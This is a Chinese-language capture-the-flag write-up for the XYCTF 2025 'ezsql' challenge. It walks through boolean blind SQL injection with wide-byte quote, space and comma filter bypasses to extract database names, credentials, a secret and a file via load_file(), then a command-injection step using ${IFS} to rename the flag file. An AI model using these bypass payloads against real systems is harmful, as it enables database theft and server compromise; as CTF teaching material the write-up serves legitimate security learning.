当前位置: 首页 > news >正文

2025 XYCTF ezsql 详细教程wp

news 来源:原创 2025/6/15 10:08:37

2025 XYCTF ezsql 详细教程wp

解题技巧

  • 空格绕过:使用%09
  • #号绕过:使用%23
  • 单引号绕过:使用宽字节注入%df'
  • limit 1,1绕过:使用limit%091%09offset%090
  • 这题我用的是布尔盲注,不知道师傅们有没有比这个更简单的办法
  • 因为是盲注,所以每条语句都需要爆破,我用的是burp的爆破,然后再导出ascii码查看值的办法
  • ,被过滤了,采用from for,爆破的时候payload放from后面那个值就行
  • limit%091%09offset%090爆破的payload放最后那个0那个位置

详细步骤

1. 数据库信息收集

1.1 查找数据库数量
username=1%df'%09or%09(select%09count(schema_name)%09from%09information_schema.schemata)=6%23&password=1

结果:共6个数据库

1.2 查找所有库名长度
username=1%df'%09or%09length(substr((select%09schema_name%09from%09information_schema.schemata%09limit%091%09offset%092)from(1)))=8%23&password=1

结果:18, 6, 5, 18, 4, 3

1.3 爆当前库长度
username=1%df'%09or%09length(database())=6%23&password=1

结果:库长为6

1.4 爆当前库名
username=1%df'%09or%09ascii(substr(database()from(1)for(1)))=90%23&password=1

结果:testdb (115 100 114 115 99 97)

所以这个时候就能猜出1.2的数据库应该是:
information_schema, testdb, mysql, performance_schema, sys

2. 表信息收集

2.1 爆表数量
username=1%df'%09or%09(select%09count(table_name)%09from%09information_schema.tables%09where%09table_schema="testdb")=2%23&password=1

结果:2个表

2.2 爆表名长度

第一个表:

username=1%df'%09or%09length(substr((select%09table_name%09from%09information_schema.tables%09where%09table_schema="testdb"%09limit%091%09offset%090)from(1)))=12%23&password=1

结果:12

第二个表:

username=1%df'%09or%09length(substr((select%09table_name%09from%09information_schema.tables%09where%09table_schema="testdb"%09limit%091%09offset%091)from(1)))=4%23&password=1

结果:4

2.3 爆表名

表一名称:

username=1%df'%09or%09ascii(substr((select%09table_name%09from%09information_schema.tables%09where%09table_schema="testdb"%09limit%091%09offset%090)from(1)for(1)))=90%23&password=1

结果:double_check (100 111 117 98 108 101 95 99 104 101 99 107)

表二名称:

username=1%df'%09or%09ascii(substr((select%09table_name%09from%09information_schema.tables%09where%09table_schema="testdb"%09limit%091%09offset%091)from(1)for(1)))=90%23&password=1

结果:user (117 115 101 114)

3. 字段信息收集

3.1 double_check表

字段数量:

username=1%df'%09or%09(select%09count(column_name)%09from%09information_schema.columns%09where%09table_name="double_check")=1%23&password=1

结果:1个字段

字段长度:

username=1%df'%09or%09length(substr((select%09column_name%09from%09information_schema.columns%09where%09table_name="double_check"%09limit%091%09offset%090)from(1)))=6%23&password=1

结果:6

字段名:

username=1%df'%09or%09ascii(substr((select%09column_name%09from%09information_schema.columns%09where%09table_name="double_check"%09limit%091%09offset%090)from(1)for(1)))=90%23&password=1

结果:secret (115 101 99 114 101 116)

3.2 user表

字段名长度(前49个字段):8, 8, 4, 4, 8, 11, 11, 11, 11, 11, 9, 11, 13, 12, 9, 10, 15, 10, 10, 12, 10, 16, 12, 15, 16, 16, 14, 19, 18, 16, 10, 12, 19, 8, 10, 11, 12, 13, 11, 15, 20, 6, 16, 7, 12, 18

爆前四个字段名:

  • username
  • password
  • Host
  • User
  • 太多了,爆不下去了,感觉username和password就够用了

4. 数据收集

4.1 获取secret值

secret字段值长度:

username=1%df'%09or%09length(substr((select%09secret%09from%09double_check%09limit%091%09offset%090)from(1)))=17%23&password=1

结果:17

secret值:

username=1%df'%09or%09ascii(substr((select%09secret%09from%09double_check%09limit%091%09offset%090)from(1)for(1)))=90%23&password=1

结果:dtfrtkcc0czkoua9S

感觉这个像个密钥,但是还不知道有啥用

4.2 获取用户信息

username值:

username=1%df'%09or%09ascii(substr((select%09username%09from%09user%09limit%091%09offset%090)from(1)for(1)))=90%23&password=1

结果:yudeyoushang

对应密码:

username=1%df'%09or%09ascii(substr((select%09password%09from%09user%09where%09username="yudeyoushang"%09limit%091%09offset%090)from(1)for(1)))=90%23&password=1

结果:zhonghengyisheng

5. 系统信息收集

当前系统用户:

username=1%df'%09or%09ascii(substr(user()from(1)for(1)))=90%23&password=1

结果:root@localhost

确定有root权限

获取Flag

使用获得的凭据:

  • 账号:yudeyoushang
  • 密码:zhonghengyisheng
  • 密钥:dtfrtkcc0czkoua9S

登录后发现存在一个rce,有空格过滤和一大堆的过滤(执行sleep${IFS}5,确实5秒才响应),${IFS}绕过空格过滤,但是命令执行没有回显。

尝试CEYE DNSLog进行数据外带,发现带不出来。

抓包发现注释中有/flag

但是直接读取flag失败了,猜测有什么限制

获取flag

  1. 执行命令移动flag绕过限制:
command=mv${IFS}/flag*${IFS}/flag.txt
  1. 读取flag.txt长度:
username=1%df'%09or%09length(load_file("/flag.txt"))=85%23&password=1

成功读取出来长度了

然后就是:

  1. 读取flag内容:
username=1%df'%09or%09ascii(substr(load_file("/flag.txt")from(1)for(1)))=1%23&password=1

88,89,67,84,70,123,99,51,49,56,55,53,53,101,45,102,56,55,57,45,52,97,54,102,45,98,101,101,101,45,51,51,55,55,55,52,49,53,97,57,53,55,125,10

flag值

XYCTF{c318755e-f879-4a6f-beee-33777415a957}

附上解ascii码的脚本

# 用来转ascii的
ascii_numbers = [90,100,101]
result = ''.join(chr(num) for num in ascii_numbers)
print(result)

相关文章:

  • Java的Selenium的特殊元素操作与定位之时间日期控件
  • BN 层做预测的时候, 方差均值怎么算
  • c++的map基本知识
  • Hyperlane框架全面详解与应用指南 [特殊字符][特殊字符][特殊字符]
  • React 初学者进阶指南:从环境搭建到部署上线
  • stc8g1k08a adc采集电压输出到串口和屏幕
  • 深入理解 QScrollArea 的 widgetResizable 属性
  • C++——静态成员
  • flutter 专题 六十八 Flutter 多图片上传
  • C++:函数
  • AF3 OpenFoldDataLoader类解读
  • PostgreSQL 一文从安装到入门掌握基本应用开发能力!
  • 【C++】--- string的使用
  • go游戏后端开发24:写完赢三张游戏
  • C++中如何使用STL中的list定义一个双向链表,并且实现增、删、改、查操作
  • #SVA语法滴水穿石# (012)关于 first_match、throughout、within 的用法
  • 华为交换机配置指南:基础到高级命令详解
  • 51单片机使用定时器实现LCD1602的时间显示(STC89C52RC)
  • 迭代器运算详解(四十二)
  • OSI模型中协议数据单元(PDU)
  • 做网站上传信息软件/互联网广告营销
  • 杭州建设网站制作/品牌网站建设哪家好
  • 做网站找雷鸣/万能搜索引擎网站
  • 网站建设云主机云服务器/武汉大学人民医院洪山院区
  • 济南软月建站/永久免费无代码开发平台网站
  • 今日的新闻头条10条/seo首页优化